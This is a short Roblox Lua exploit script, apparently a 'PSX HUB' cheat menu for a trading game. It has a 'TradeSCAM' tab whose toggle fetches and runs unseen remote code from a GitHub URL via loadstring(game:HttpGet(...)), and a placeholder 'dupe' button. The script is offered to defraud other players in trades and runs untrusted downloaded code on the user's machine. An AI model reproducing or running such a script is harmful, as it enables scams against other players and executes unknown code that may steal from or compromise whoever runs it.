local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local Libraryy = loadstring(game:HttpGet("https://raw.githubusercontent.com/Robojini/Tuturial_UI_Library/main/UI_Template_1"))()
local Window = Libraryy.CreateLib("PSX HUB🧨", "RJTheme8")
local Tab = Window:NewTab("📚 Info")
local Section = Tab:NewSection("Last update - 20.12.2022 ✨")
local Tab = Window:NewTab("📣 TradeSCAM")
local Section = Tab:NewSection("🎁 TradeScam TAB")
Section:NewToggle("\226\156\133 On / \226\157\140 Off", "", function(state)
    if state then
	lib.Message.New("\226\156\133 Script on.")
  loadstring(game:HttpGet("https://raw.githubusercontent.com/n3koglaii/katana/main/ira"))()
    else
    lib.Message.New("\226\157\140 Script off.")
    end
end)
local Tab = Window:NewTab("Dupe/Boath")
local Section = Tab:NewSection("Dm DimplesV#8669 if need help")
Section:NewButton("\226\156\133 Dupe boath!", "", function()
  lib.Message.New("\226\157\140 FIX!")
  end)
